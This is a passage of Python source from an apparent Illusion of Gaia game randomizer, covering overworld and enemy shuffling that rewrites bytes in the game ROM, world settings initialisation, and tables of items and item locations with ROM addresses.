self.overworld_menus[9][0] = new_continents[1][3]
self.overworld_menus[10][0] = new_continents[1][4]
self.overworld_menus[11][0] = new_continents[2][0]
self.overworld_menus[12][0] = new_continents[2][1]
self.overworld_menus[13][0] = new_continents[2][2]
self.overworld_menus[14][0] = new_continents[3][0]
self.overworld_menus[15][0] = new_continents[3][1]
self.overworld_menus[16][0] = new_continents[3][2]
self.overworld_menus[17][0] = new_continents[3][3]
self.overworld_menus[18][0] = new_continents[4][0]
self.overworld_menus[19][0] = new_continents[4][1]
self.graph[10][1].clear()
self.graph[11][1].clear()
self.graph[12][1].clear()
self.graph[13][1].clear()
self.graph[14][1].clear()
self.graph[10][10].clear()
self.graph[11][10].clear()
self.graph[12][10].clear()
self.graph[13][10].clear()
self.graph[14][10].clear()
# Add new overworld to the graph
for entry in self.overworld_menus:
new_entry = self.overworld_menus[entry][0]
self.graph[self.overworld_menus[entry][2]][1].append(self.overworld_menus[new_entry][3])
self.graph[self.overworld_menus[new_entry][3]][1].remove(self.overworld_menus[new_entry][2])
self.graph[self.overworld_menus[new_entry][3]][1].append(self.overworld_menus[entry][2])
return True
# Shuffle enemies in ROM
def enemize(self, f, rom_offset=0):
f.seek(0)
rom = f.read()
# test_enemy = 13 # TESTING!
# test_set = self.enemies[test_enemy][0]
complex_enemies = [4, 15, 53, 62, 88] # Enemies with many sprites, or are no fun
max_complex = 5
# Get list of enemysets
enemysets = []
for set in self.enemysets:
enemysets.append(set)
f.seek(0)
rom = f.read()
# Shuffle enemy stats in Insane
if self.enemizer == "Insane":
insane_enemies = []
insane_templates = []
for enemy in self.enemies:
if self.enemies[enemy][5] and enemy != 102: # Special exception for Zombies
insane_enemies.append(enemy)
insane_templates.append(self.enemies[enemy][2])
random.shuffle(insane_templates)
insane_dictionary = {}
i = 0
for enemy in insane_enemies:
insane_dictionary[enemy] = insane_templates[i]
i += 1
# Randomize enemy spritesets
for map in self.maps:
complex_ct = 0
oldset = self.maps[map][0]
# Determine new enemyset for map
if self.enemizer == "Limited":
sets = [oldset]
elif not self.maps[map][7]:
sets = enemysets[:]
else:
sets = self.maps[map][7][:]
random.shuffle(sets)
newset = sets[0]
# if 10 in sets: # TESTING!
# newset = 10
# newset = test_set # TESTING!
# Gather enemies from old and new sets
old_enemies = []
new_enemies = []
for enemy in self.enemies:
if self.enemies[enemy][0] == oldset:
old_enemies.append(enemy)
if self.enemies[enemy][0] == newset and self.enemies[enemy][5]:
new_enemies.append(enemy)
# Update map header to reflect new enemyset
if self.maps[map][3]:
self.map_patches.append([self.maps[map][3],self.enemysets[newset][0],self.maps[map][4]])
# Randomize each enemy in map
addr_start = self.maps[map][5]
addr_end = self.maps[map][6]
for enemy in old_enemies:
# print self.enemies[enemy][3]
done = False
addr = int(addr_start, 16) + rom_offset
while not done:
addr = rom.find(self.enemies[enemy][1] + self.enemies[enemy][2], addr + 1)
if addr < 0 or addr > int(addr_end, 16) + rom_offset:
done = True
else:
# Pick an enemy from new set
enemytype = self.enemies[enemy][3]
walkable = self.enemies[enemy][4]
new_enemies_tmp = new_enemies[:]
# Get X/Y for special placement exceptions
f.seek(addr - 3)
xcoord = binascii.hexlify(f.read(1))
ycoord = binascii.hexlify(f.read(1))
# 4-Ways cannot be on a #$XF x-coord
if newset == 1 and 13 in new_enemies_tmp:
if xcoord[1] == 102:
new_enemies_tmp.remove(13)
# Zip Flies can't be too close to map origin
elif newset == 10 and 103 in new_enemies_tmp:
if int(xcoord, 16) <= 4 or int(ycoord, 16) <= 4:
new_enemies_tmp.remove(103)
random.shuffle(new_enemies_tmp)
i = 0
found_enemy = False
# if 13 in new_enemies_tmp: # TESTING!
# new_enemy = 13
# found_enemy = True
while not found_enemy:
new_enemy = new_enemies_tmp[i]
new_enemytype = self.enemies[new_enemy][3]
new_walkable = self.enemies[new_enemy][4]
if walkable or new_enemytype == 3 or walkable == new_walkable or i == len(new_enemies_tmp) - 1:
found_enemy = True
# Limit number of complex enemies per map
if new_enemy in complex_enemies:
complex_ct += 1
if complex_ct >= max_complex:
for enemy_tmp in new_enemies:
if enemy_tmp in complex_enemies:
new_enemies.remove(enemy_tmp)
i -= 1
i += 1
f.seek(addr - 1)
# f.write(b"\x00" + self.enemies[test_enemy][1] + self.enemies[test_enemy][2]) # TESTING!
f.write(b"\x00" + self.enemies[new_enemy][1])
if self.enemizer == "Balanced" and enemy == 102:
f.write(b"\x47")
elif map != 27 and self.enemizer != "Balanced": # Moon Tribe cave enemies retain same template
if self.enemizer == "Insane" and new_enemy != 102: # Again, zombie exception
f.write(insane_dictionary[new_enemy])
else:
f.write(self.enemies[new_enemy][2])
# Disable all non-enemy sprites
if self.enemizer != "Limited":
for sprite in self.nonenemy_sprites:
f.seek(int(self.nonenemy_sprites[sprite][1], 16) + rom_offset + 3)
f.write(b"\x02\xe0")
# Build world
def __init__(self, settings: RandomizerData, statues_required=6, statues=[1,2,3,4,5,6], statue_req=StatueReq.GAME_CHOICE.value, kara=3, gem=[3,5,8,12,20,30,50], incatile=[9,5], hieroglyphs=[1,2,3,4,5,6], boss_order=[1,2,3,4,5,6,7]):
self.seed = settings.seed
self.race_mode = settings.race_mode
self.fluteless = settings.fluteless
self.statues = statues
self.statues_required = statues_required
self.statue_req = statue_req
self.boss_order = boss_order
self.dungeons_req = []
for x in self.statues:
self.dungeons_req.append(self.boss_order[x-1])
gaia_coinflip = random.randint(0, 1)
if settings.goal.value == Goal.RED_JEWEL_HUNT.value:
self.goal = "Red Jewel Hunt"
elif settings.goal.value == Goal.APO_GAIA.value or (settings.goal.value == Goal.RANDOM_GAIA.value and gaia_coinflip):
self.goal = "Apocalypse Gaia"
else:
self.goal = "Dark Gaia"
if settings.logic.value == Logic.COMPLETABLE.value:
self.logic_mode = "Completable"
elif settings.logic.value == Logic.BEATABLE.value:
self.logic_mode = "Beatable"
else:
self.logic_mode = "Chaos"
if settings.entrance_shuffle.value == EntranceShuffle.NONE.value:
self.entrance_shuffle = "None"
elif settings.entrance_shuffle.value == EntranceShuffle.COUPLED.value:
self.entrance_shuffle = "Coupled"
elif settings.entrance_shuffle.value == EntranceShuffle.UNCOUPLED.value:
self.entrance_shuffle = "Uncoupled"
if settings.start_location.value == StartLocation.SOUTH_CAPE.value:
self.start_mode = "South Cape"
elif settings.start_location.value == StartLocation.SAFE.value:
self.start_mode = "Safe"
elif settings.start_location.value == StartLocation.UNSAFE.value:
self.start_mode = "Unsafe"
else:
self.start_mode = "Forced Unsafe"
if settings.enemizer.value == Enemizer.NONE.value:
self.enemizer = "None"
elif settings.enemizer.value == Enemizer.BALANCED.value:
self.enemizer = "Balanced"
elif settings.enemizer.value == Enemizer.LIMITED.value:
self.enemizer = "Limited"
elif settings.enemizer.value == Enemizer.FULL.value:
self.enemizer = "Full"
else:
self.enemizer = "Insane"
if settings.ohko:
self.variant = ["OHKO"]
elif settings.red_jewel_madness:
self.variant = ["RJM"]
else:
self.variant = []
if settings.allow_glitches:
self.variant.append("Allow Glitches")
if settings.boss_shuffle:
self.variant.append("Boss Shuffle")
if settings.overworld_shuffle:
self.variant.append("Overworld Shuffle")
if settings.open_mode:
self.variant.append("Open Mode")
if settings.z3:
self.variant.append("Z3 Mode")
self.firebird = settings.firebird
self.start_loc = 10
# self.level = settings.level.value
self.difficulty = settings.difficulty.value
self.kara = kara
self.gem = gem
self.incatile = incatile
self.hieroglyphs = hieroglyphs
self.placement_log = []
self.exit_log = []
self.spoilers = []
self.required_items = [20, 36]
self.good_items = [10, 13, 24, 25, 37, 62, 63, 64]
self.trolly_locations = [32, 45, 64, 65, 102, 108, 121, 128, 136, 147]
self.free_locations = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 24, 33, 34, 35, 36, 37, 38, 39]
self.map_patches = []
self.visited = []
self.items_collected = []
self.item_destinations = []
self.open_locations = [[],[]]
self.open_edges = []
self.graph_viz = None
# Initialize item pool, considers special attacks as "items"
# Format = { ID: [Quantity, Type code (1=item, 2=ability, 3=statue,4=other),
# ROM Code, Name, TakesInventorySpace,
# ProgressionType (1=unlocks new locations,2=quest item,3=no progression)] }
self.item_pool = {
# Items
0: [2, 1, b"\x00", "Nothing", False, 3],
1: [45, 1, b"\x01", "Red Jewel", False, 1],
2: [1, 1, b"\x02", "Prison Key", True, 1],
3: [1, 1, b"\x03", "Inca Statue A", True, 1],
4: [1, 1, b"\x04", "Inca Statue B", True, 1],
5: [0, 1, b"\x05", "Inca Melody", True, 3],
6: [12, 1, b"\x06", "Herb", False, 3],
7: [1, 1, b"\x07", "Diamond Block", True, 1],
8: [1, 1, b"\x08", "Wind Melody", True, 1],
9: [1, 1, b"\x09", "Lola's Melody", True, 1],
10: [1, 1, b"\x0a", "Large Roast", True, 1],
11: [1, 1, b"\x0b", "Mine Key A", True, 1],
12: [1, 1, b"\x0c", "Mine Key B", True, 1],
13: [1, 1, b"\x0d", "Memory Melody", True, 1],
14: [4, 1, b"\x0e", "Crystal Ball", True, 2],
15: [1, 1, b"\x0f", "Elevator Key", True, 1],
16: [1, 1, b"\x10", "Mu Palace Key", True, 1],
17: [1, 1, b"\x11", "Purification Stone", True, 1],
18: [2, 1, b"\x12", "Statue of Hope", True, 1],
19: [2, 1, b"\x13", "Rama Statue", False, 2],
20: [1, 1, b"\x14", "Magic Dust", True, 2],
21: [0, 1, b"\x15", "Blue Journal", False, 3],
22: [1, 1, b"\x16", "Lance's Letter", False, 3],
23: [1, 1, b"\x17", "Necklace Stones", True, 1],
24: [1, 1, b"\x18", "Will", True, 1],
25: [1, 1, b"\x19", "Teapot", True, 1],
26: [3, 1, b"\x1a", "Mushroom Drops", True, 1],
27: [0, 1, b"\x1b", "Bag of Gold", False, 3],
28: [1, 1, b"\x1c", "Black Glasses", False, 1],
29: [1, 1, b"\x1d", "Gorgon Flower", True, 1],
30: [1, 1, b"\x1e", "Hieroglyph", False, 2],
31: [1, 1, b"\x1f", "Hieroglyph", False, 2],
32: [1, 1, b"\x20", "Hieroglyph", False, 2],
33: [1, 1, b"\x21", "Hieroglyph", False, 2],
34: [1, 1, b"\x22", "Hieroglyph", False, 2],
35: [1, 1, b"\x23", "Hieroglyph", False, 2],
36: [1, 1, b"\x24", "Aura", True, 1],
37: [1, 1, b"\x25", "Lola's Letter", False, 1],
38: [1, 1, b"\x26", "Father's Journal", False, 2],
39: [1, 1, b"\x27", "Crystal Ring", False, 1],
40: [1, 1, b"\x28", "Apple", True, 1],
41: [1, 1, b"\x2e", "2 Red Jewels", False, 1],
42: [1, 1, b"\x2f", "3 Red Jewels", False, 1],
# Status Upgrades
50: [3, 1, b"\x87", "HP Upgrade", False, 3],
51: [1, 1, b"\x89", "DEF Upgrade", False, 3],
52: [2, 1, b"\x88", "STR Upgrade", False, 3],
53: [1, 1, b"\x8a", "Psycho Dash Upgrade", False, 3],
54: [2, 1, b"\x8b", "Dark Friar Upgrade", False, 3],
55: [0, 1, b"\x8c", "Heart Piece", False, 3],
# Abilities
60: [0, 2, "", "Nothing", False, 3],
61: [1, 2, "", "Psycho Dash", False, 1],
62: [1, 2, "", "Psycho Slider", False, 1],
63: [1, 2, "", "Spin Dash", False, 1],
64: [1, 2, "", "Dark Friar", False, 1],
65: [1, 2, "", "Aura Barrier", False, 1],
66: [1, 2, "", "Earthquaker", False, 1],
67: [0, 2, "", "Firebird", False, 1],
# Mystic Statues
100: [1, 3, "", "Mystic Statue 1", False, 2],
101: [1, 3, "", "Mystic Statue 2", False, 2],
102: [1, 3, "", "Mystic Statue 3", False, 2],
103: [1, 3, "", "Mystic Statue 4", False, 2],
104: [1, 3, "", "Mystic Statue 5", False, 2],
105: [1, 3, "", "Mystic Statue 6", False, 2],
106: [0, 3, "", "Mystic Statue", False, 2],
# Event Switches
500: [0, 4, "", "Kara Released", False, 1],
501: [0, 4, "", "Itory: Got Lilly", False, 1],
502: [0, 4, "", "Moon Tribe: Healed Spirits", False, 1],
503: [0, 4, "", "Inca: Beat Castoth", False, 1],
504: [0, 4, "", "Freejia: Found Laborer", False, 1],
505: [0, 4, "", "Neil's: Memory Restored", False, 1],
506: [0, 4, "", "Sky Garden: Map 82 NW Switch", False, 1],
507: [0, 4, "", "Sky Garden: Map 82 NE Switch", False, 1],
508: [0, 4, "", "Sky Garden: Map 82 NW Switch", False, 1],
509: [0, 4, "", "Sky Garden: Map 84 Switch", False, 1],
510: [0, 4, "", "Seaside: Fountain Purified", False, 1],
511: [0, 4, "", "Mu: Water Lowered 1", False, 1],
512: [0, 4, "", "Mu: Water Lowered 2", False, 1],
513: [0, 4, "", "Angel: Puzzle Complete", False, 1],
514: [0, 4, "", "Mt Kress: Drops Used 1", False, 1],
515: [0, 4, "", "Mt Kress: Drops Used 2", False, 1],
516: [0, 4, "", "Mt Kress: Drops Used 3", False, 1],
517: [0, 4, "", "Pyramid: Hieroglyphs Placed", False, 1],
518: [0, 4, "", "Babel: Castoth Defeated", False, 1],
519: [0, 4, "", "Babel: Viper Defeated", False, 1],
520: [0, 4, "", "Babel: Vampires Defeated", False, 1],
521: [0, 4, "", "Babel: Sand Fanger Defeated", False, 1],
522: [0, 4, "", "Babel: Mummy Queen Defeated", False, 1],
523: [0, 4, "", "Mansion: Solid Arm Defeated", False, 1],
# Misc
600: [0, 4, "", "Freedan Access", False, 1],
601: [0, 4, "", "Glitches", False, 1],
602: [0, 4, "", "Early Firebird", False, 1]
}
# Define Item/Ability/Statue locations
# Format: { ID: [Region, Type (1=item,2=ability,3=statue,4=other), Filled Flag,
# Filled Item, Restricted Items, Item Addr, Text Addr, Text2 Addr,
# Special (map# or inventory addr), Name, Swapped Flag]}
# (For random start, [6]=Type, [7]=XY_spawn_data)
self.item_locations = {
# Jeweler
0: [2, 1, False, 0, [], "8d019", "8d19d", "", "8d260", "Jeweler Reward 1 "],
1: [3, 1, False, 0, [], "8d028", "8d1ba", "", "8d274", "Jeweler Reward 2 "],
2: [4, 1, False, 0, [], "8d037", "8d1d7", "", "8d288", "Jeweler Reward 3 "],
3: [5, 1, False, 0, [], "8d04a", "8d1f4", "", "8d29c", "Jeweler Reward 4 "],
4: [6, 1, False, 0, [], "8d059", "8d211", "", "8d2b0", "Jeweler Reward 5 "],
5: [7, 1, False, 0, [], "8d069", "8d2ea", "", "8d2c4", "Jeweler Reward 6 "],
# South Cape
6: [21, 1, False, 0, [], "F51D", "F52D", "F543", "", "South Cape: Bell Tower "],
7: [20, 1, False, 0, [], "4846e", "48479", "", "", "South Cape: Fisherman "], # text2 was 0c6a1
8: [26, 1, False, 0, [], "F59D", "F5AD", "F5C3", "", "South Cape: Lance's House "],
9: [23, 1, False, 0, [], "499e4", "49be5", "", "", "South Cape: Lola "],
10: [21, 2, False, 0, [64, 65, 66], "c830a", "Safe", b"\xE0\x00\x70\x00\x83\x00\x43", b"\x01", "South Cape: Dark Space "],
# Edward's
11: [30, 1, False, 0, [], "4c214", "4c299", "", "", "Edward's Castle: Hidden Guard "],
12: [30, 1, False, 0, [], "4d0ef", "4d141", "", "", "Edward's Castle: Basement "],
13: [32, 1, False, 0, [], "4d32f", "4d4b1", "", "", "Edward's Prison: Hamlet "], # text 4d5f4?
14: [32, 2, False, 0, [64, 65, 66], "c8637", "", "", b"\x0b", "Edward's Prison: Dark Space "],
# Underground Tunnel
15: [42, 1, False, 0, [], "1AFA9", "", "", "", "Underground Tunnel: Spike's Chest "],
16: [44, 1, False, 0, [], "1AFAE", "", "", "", "Underground Tunnel: Small Room Chest"],
17: [48, 1, False, 0, [], "1AFB3", "", "", "", "Underground Tunnel: Ribber's Chest "],
18: [49, 1, False, 0, [], "F61D", "F62D", "F643", "", "Underground Tunnel: Barrels "],
19: [47, 2, False, 0, [], "c8aa2", "Unsafe", b"\xA0\x00\xD0\x04\x83\x00\x74", b"\x12", "Underground Tunnel: Dark Space "], # Always open
# Itory
20: [51, 1, False, 0, [], "F69D", "F6AD", "F6C3", "", "Itory Village: Logs "],
21: [58, 1, False, 0, [], "4f375", "4f38d", "4f3a8", "", "Itory Village: Cave "],
22: [51, 2, False, 0, [64, 65, 66], "c8b34", "Safe", b"\x30\x04\x90\x00\x83\x00\x35", b"\x15", "Itory Village: Dark Space "],
# Moon Tribe
23: [62, 1, False, 0, [], "4fae1", "4faf9", "4fb16", "", "Moon Tribe: Cave "],
# Inca
24: [71, 1, False, 0, [], "1AFB8", "", "", "", "Inca Ruins: Diamond-Block Chest "],
25: [92, 1, False, 0, [], "1AFC2", "", "", "", "Inca Ruins: Broken Statues Chest "],
26: [83, 1, False, 0, [], "1AFBD", "", "", "", "Inca Ruins: Stone Lord Chest "],
27: [93, 1, False, 0, [], "1AFC6", "", "", "", "Inca Ruins: Slugger Chest "],
28: [76, 1, False, 0, [], "9c5bd", "9c614", "9c637", "", "Inca Ruins: Singing Statue "],
29: [96, 2, False, 0, [], "c9302", "Unsafe", b"\x10\x01\x90\x00\x83\x00\x32", b"\x28", "Inca Ruins: Dark Space 1 "], # Always open
30: [93, 2, False, 0, [], "c923b", "Unsafe", b"\xC0\x01\x50\x01\x83\x00\x32", b"\x26", "Inca Ruins: Dark Space 2 "],
31: [77, 2, False, 0, [], "c8db8", "", "", b"\x1e", "Inca Ruins: Final Dark Space "],
# Gold Ship
32: [100, 1, False, 0, [], "5965e", "5966e", "", "", "Gold Ship: Seth "],
# Diamond Coast
33: [102, 1, False, 0, [], "F71D", "F72D", "F743", "", "Diamond Coast: Jar "],
# Freejia
34: [121, 1, False, 0, [], "F79D", "F7AD", "F7C3", "", "Freejia: Hotel "],
35: [110, 1, False, 0, [], "5b6d8", "5b6e8", "", "", "Freejia: Creepy Guy "],
36: [110, 1, False, 0, [], "5cf9e", "5cfae", "5cfc4", "", "Freejia: Trash Can 1 "],
37: [110, 1, False, 0, [], "5cf3d", "5cf49", "", "", "Freejia: Trash Can 2 "], # text2 was 5cf5b
38: [115, 1, False, 0, [], "5b8b7", "5b962", "5b9ee", "", "Freejia: Snitch "], # text1 was @5b94d
39: [125, 2, False, 0, [64, 65, 66], "c96ce", "Safe", b"\x40\x00\xa0\x00\x83\x00\x11", b"\x34", "Freejia: Dark Space "],
# Diamond Mine
40: [134, 1, False, 0, [], "1AFD0", "", "", "", "Diamond Mine: Chest "],
41: [137, 1, False, 0, [], "5d7e4", "5d819", "5d830", "", "Diamond Mine: Trapped Laborer "],
42: [143, 1, False, 0, [], "aa777", "aa85c", "", "", "Diamond Mine: Laborer w/Elevator Key"], # text1 was aa811
43: [148, 1, False, 0, [], "5d4d2", "5d4eb", "5d506", "", "Diamond Mine: Morgue "],
44: [149, 1, False, 0, [], "aa757", "aa7ef", "", "", "Diamond Mine: Laborer w/Mine Key "], # text1 was aa7b4
45: [150, 1, False, 0, [], "5d2b0", "5d2da", "", "", "Diamond Mine: Sam "],
46: [136, 2, False, 0, [], "c9a87", "Unsafe", b"\xb0\x01\x70\x01\x83\x00\x32", b"\x40", "Diamond Mine: Appearing Dark Space "], # Always open
47: [131, 2, False, 0, [], "c98b0", "Unsafe", b"\xd0\x00\xc0\x00\x83\x00\x61", b"\x3d", "Diamond Mine: Dark Space at Wall "],
48: [142, 2, False, 0, [], "c9b49", "", "", b"\x42", "Diamond Mine: Dark Space behind Wall"],
# Sky Garden
49: [172, 1, False, 0, [], "1AFDD", "", "", "", "Sky Garden: (NE) Platform Chest "],
50: [173, 1, False, 0, [], "1AFD9", "", "", "", "Sky Garden: (NE) Blue Cyber Chest "],
51: [174, 1, False, 0, [], "1AFD5", "", "", "", "Sky Garden: (NE) Statue Chest "],
52: [180, 1, False, 0, [], "1AFE2", "", "", "", "Sky Garden: (SE) Dark Side Chest "],
53: [185, 1, False, 0, [], "1AFE7", "", "", "", "Sky Garden: (SW) Ramp Chest "],
54: [186, 1, False, 0, [], "1AFEC", "", "", "", "Sky Garden: (SW) Dark Side Chest "],
55: [194, 1, False, 0, [], "1AFF1", "", "", "", "Sky Garden: (NW) Top Chest "],
56: [194, 1, False, 0, [], "1AFF5", "", "", "", "Sky Garden: (NW) Bottom Chest "],
57: [170, 2, False, 0, [64, 65, 66], "c9d63", "Safe", b"\x90\x00\x70\x00\x83\x00\x22", b"\x4c", "Sky Garden: Dark Space (Foyer) "],
58: [169, 2, False, 0, [], "ca505", "Unsafe", b"\x70\x00\xa0\x00\x83\x00\x11", b"\x56", "Sky Garden: Dark Space (SE) "], # in the room
59: [183, 2, False, 0, [], "ca173", "", "", b"\x51", "Sky Garden: Dark Space (SW) "],
60: [195, 2, False, 0, [], "ca422", "Unsafe", b"\x20\x00\x70\x00\x83\x00\x44", b"\x54", "Sky Garden: Dark Space (NW) "],
# Seaside Palace
61: [202, 1, False, 0, [], "1AFFF", "", "", "", "Seaside Palace: Side Room Chest "],
62: [200, 1, False, 0, [], "1AFFA", "", "", "", "Seaside Palace: First Area Chest "],
63: [205, 1, False, 0, [], "1B004", "", "", "", "Seaside Palace: Second Area Chest "],
64: [206, 1, False, 0, [], "68af7", "68ea9", "68f02", "", "Seaside Palace: Buffy "],
65: [208, 1, False, 0, [], "6922d", "6939e", "693b7", "", "Seaside Palace: Coffin "], # text1 was 69377
66: [200, 2, False, 0, [64, 65, 66], "ca574", "Safe", b"\xf0\x02\x90\x00\x83\x00\x64", b"\x5a", "Seaside Palace: Dark Space "],
# Mu
67: [217, 1, False, 0, [], "1B012", "", "", "", "Mu: Empty Chest 1 "],
68: [220, 1, False, 0, [], "1B01B", "", "", "", "Mu: Empty Chest 2 "],
69: [225, 1, False, 0, [], "698be", "698d2", "", "", "Mu: Hope Statue 1 "],
70: [236, 1, False, 0, [], "69966", "69975", "", "", "Mu: Hope Statue 2 "],
71: [215, 1, False, 0, [], "1B00D", "", "", "", "Mu: Chest s/o Hope Room 2 "],
72: [214, 1, False, 0, [], "1B009", "", "", "", "Mu: Rama Chest N "],
73: [219, 1, False, 0, [], "1B016", "", "", "", "Mu: Rama Chest E "],
74: [218, 2, False, 0, [], "ca92d", "", "", b"\x60", "Mu: Open Dark Space "], # Always open
75: [228, 2, False, 0, [], "caa99", "", "", b"\x62", "Mu: Slider Dark Space "],
# Angel Village
76: [254, 1, False, 0, [], "F81D", "F82D", "F843", "", "Angel Village: Dance Hall "],
77: [255, 2, False, 0, [64, 65, 66], "caf67", "Safe", b"\x90\x01\xb0\x00\x83\x01\x12", b"\x6c", "Angel Village: Dark Space "],
# Angel Dungeon
78: [265, 1, False, 0, [], "1B020", "", "", "", "Angel Dungeon: Slider Chest "],
79: [271, 1, False, 0, [], "F89D", "F8AD", "F8C3", "", "Angel Dungeon: Ishtar's Room "],
80: [274, 1, False, 0, [], "1B02A", "", "", "", "Angel Dungeon: Puzzle Chest 1 "],
81: [274, 1, False, 0, [], "1B02E", "", "", "", "Angel Dungeon: Puzzle Chest 2 "],
82: [273, 1, False, 0, [], "1B025", "", "", "", "Angel Dungeon: Ishtar's Chest "],
# Watermia
83: [280, 1, False, 0, [], "F91D", "F92D", "F943", "", "Watermia: West Jar "],
85: [286, 1, False, 0, [], "7ad21", "7aede", "", "", "Watermia: Lance "], # text2 was 7afa7
86: [283, 1, False, 0, [], "F99D", "F9AD", "F9C3", "", "Watermia: Gambling House "],
87: [280, 1, False, 0, [], "79248", "79288", "792a1", "", "Watermia: Russian Glass "],
88: [282, 2, False, 0, [64, 65, 66], "cb644", "Safe", b"\x40\x00\xa0\x00\x83\x00\x11", b"\x7c", "Watermia: Dark Space "],
# Great Wall
89: [290, 1, False, 0, [], "7b5c5", "7b5d1", "", "", "Great Wall: Necklace 1 "],
90: [292, 1, False, 0, [], "7b625", "7b631", "", "", "Great Wall: Necklace 2 "],
91: [292, 1, False, 0, [], "1B033", "", "", "", "Great Wall: Chest 1 "],
92: [294, 1, False, 0, [], "1B038", "", "", "", "Great Wall: Chest 2 "],
93: [295, 2, False, 0, [], "cbb11", "Unsafe", b"\x60\x00\xc0\x02\x83\x20\x38", b"\x85", "Great Wall: Archer Dark Space "],
94: [297, 2, False, 0, [], "cbb80", "Unsafe", b"\x50\x01\x80\x04\x83\x00\x63", b"\x86", "Great Wall: Platform Dark Space "], # Always open
95: [300, 2, False, 0, [], "cbc60", "", "", b"\x88", "Great Wall: Appearing Dark Space "],
# Euro
96: [310, 1, False, 0, [], "FA1D", "FA2D", "FA43", "", "Euro: Alley "],
97: [310, 1, False, 0, [], "7c0b3", "7c0f3", "", "", "Euro: Apple Vendor "],
98: [320, 1, False, 0, [], "7e51f", "7e534", "7e54a", "", "Euro: Hidden House "],
99: [323, 1, False, 0, [], "7cd12", "7cd39", "7cd9b", "", "Euro: Store Item 1 "],
100: [323, 1, False, 0, [], "7cdf9", "7ce28", "7ce3e", "", "Euro: Store Item 2 "], # text2 was 7cedd
101: [321, 1, False, 0, [], "FA9D", "FAAD", "FAC3", "", "Euro: Shrine "],
102: [315, 1, False, 0, [], "7df58", "7e10a", "", "", "Euro: Ann "],
103: [325, 2, False, 0, [64, 65, 66], "cc0b0", "Safe", b"\xb0\x00\xb0\x00\x83\x00\x11", b"\x99", "Euro: Dark Space "],
# Mt Temple
104: [336, 1, False, 0, [], "1B03D", "", "", "", "Mt. Temple: Red Jewel Chest "],
105: [338, 1, False, 0, [], "1B042", "", "", "", "Mt. Temple: Drops Chest 1 "],
106: [342, 1, False, 0, [], "1B047", "", "", "", "Mt. Temple: Drops Chest 2 "],
107: [343, 1, False, 0, [], "1B04C", "", "", "", "Mt. Temple: Drops Chest 3 "],
108: [345, 1, False, 0, [], "1B051", "", "", "", "Mt. Temple: Final Chest "],
109: [332, 2, False, 0, [], "cc24f", "Unsafe", b"\xf0\x01\x10\x03\x83\x00\x44", b"\xa1", "Mt. Temple: Dark Space 1 "],
110: [337, 2, False, 0, [], "cc419", "Unsafe", b"\xc0\x07\xc0\x00\x83\x00\x28", b"\xa3", "Mt. Temple: Dark Space 2 "],
111: [343, 2, False, 0, [], "cc7b8", "", "", b"\xa7", "Mt. Temple: Dark Space 3 "],
# Natives'
112: [353, 1, False, 0, [], "FB1D", "FB2D", "FB43", "", "Natives' Village: Statue Room "],
113: [354, 1, False, 0, [], "893af", "8942a", "", "", "Natives' Village: Statue "],
114: [350, 2, False, 0, [64, 65, 66], "cca37", "Safe", b"\xc0\x01\x50\x00\x83\x00\x22", b"\xac", "Natives' Village: Dark Space "],
# Ankor Wat
115: [361, 1, False, 0, [], "1B056", "", "", "", "Ankor Wat: Ramp Chest "],
116: [370, 1, False, 0, [], "1B05B", "", "", "", "Ankor Wat: Flyover Chest "],
117: [378, 1, False, 0, [], "1B060", "", "", "", "Ankor Wat: U-Turn Chest "],
118: [382, 1, False, 0, [], "1B065", "", "", "", "Ankor Wat: Drop Down Chest "],
119: [389, 1, False, 0, [], "1B06A", "", "", "", "Ankor Wat: Forgotten Chest "],
120: [380, 1, False, 0, [], "89fa3", "89fbb", "", "", "Ankor Wat: Glasses Location "], # slow text @89fdc
121: [391, 1, False, 0, [], "89adc", "89af1", "89b07", "", "Ankor Wat: Spirit "], # item was 89b0d, text was 89e2e
122: [372, 2, False, 0, [], "cce92", "Unsafe", b"\x20\x04\x30\x03\x83\x00\x46", b"\xb6", "Ankor Wat: Garden Dark Space "], # Always open
123: [377, 2, False, 0, [], "cd0a2", "", "", b"\xb8", "Ankor Wat: Earthquaker Dark Space "],
124: [383, 2, False, 0, [], "cd1a7", "Unsafe", b"\xb0\x02\xc0\x01\x83\x00\x33", b"\xbb", "Ankor Wat: Drop Down Dark Space "], # Always open
# Dao
125: [400, 1, False, 0, [], "8b1b0", "", "", "", "Dao: Entrance Item 1 "],
126: [400, 1, False, 0, [], "8b1b5", "", "", "", "Dao: Entrance Item 2 "],
127: [400, 1, False, 0, [], "FB9D", "FBAD", "FBC3", "", "Dao: East Grass "],
128: [403, 1, False, 0, [], "8b016", "8b073", "8b090", "", "Dao: Snake Game "],
129: [400, 2, False, 0, [64, 65, 66], "cd3d0", "Safe", b"\x20\x00\x80\x00\x83\x00\x23", b"\xc3", "Dao: Dark Space "],
# Pyramid
130: [411, 1, False, 0, [], "8dcb7", "8e66c", "8e800", "", "Pyramid: Dark Space Top "], # text2 was 8e800
131: [412, 1, False, 0, [], "FC1D", "FC2D", "FC43", "", "Pyramid: Hidden Platform "],
132: [442, 1, False, 0, [], "8c7b2", "8c7c9", "", "", "Pyramid: Hieroglyph 1 "],
133: [422, 1, False, 0, [], "1B06F", "", "", "", "Pyramid: Room 2 Chest "],
134: [443, 1, False, 0, [], "8c879", "8c88c", "", "", "Pyramid: Hieroglyph 2 "],
135: [432, 1, False, 0, [], "1B079", "", "", "", "Pyramid: Room 3 Chest "],
136: [444, 1, False, 0, [], "8c921", "8c934", "", "", "Pyramid: Hieroglyph 3 "],
137: [439, 1, False, 0, [], "1B07E", "", "", "", "Pyramid: Room 4 Chest "],
138: [445, 1, False, 0, [], "8c9c9", "8c9dc", "", "", "Pyramid: Hieroglyph 4 "],
139: [428, 1, False, 0, [], "1B074", "", "", "", "Pyramid: Room 5 Chest "],
140: [446, 1, False, 0, [], "8ca71", "8ca84", "", "", "Pyramid: Hieroglyph 5 "],
141: [447, 1, False, 0, [], "8cb19", "8cb2c", "", "", "Pyramid: Hieroglyph 6 "],
142: [413, 2, True, 0, [], "cd570", "Unsafe", b"\xc0\x01\x90\x03\x83\x00\x44", b"\xcc", "Pyramid: Dark Space Bottom "], # Always open
# Babel
143: [461, 1, False, 0, [], "FC9D", "FCAD", "FCC3", "", "Babel: Pillow "],
144: [461, 1, False, 0, [], "99a4f", "99ae4", "99afe", "", "Babel: Force Field "], # item was 99a61
145: [461, 2, False, 0, [64, 65, 66], "ce09b", "Forced Unsafe", b"\x90\x07\xb0\x01\x83\x10\x28", b"\xdf", "Babel: Dark Space Bottom "],
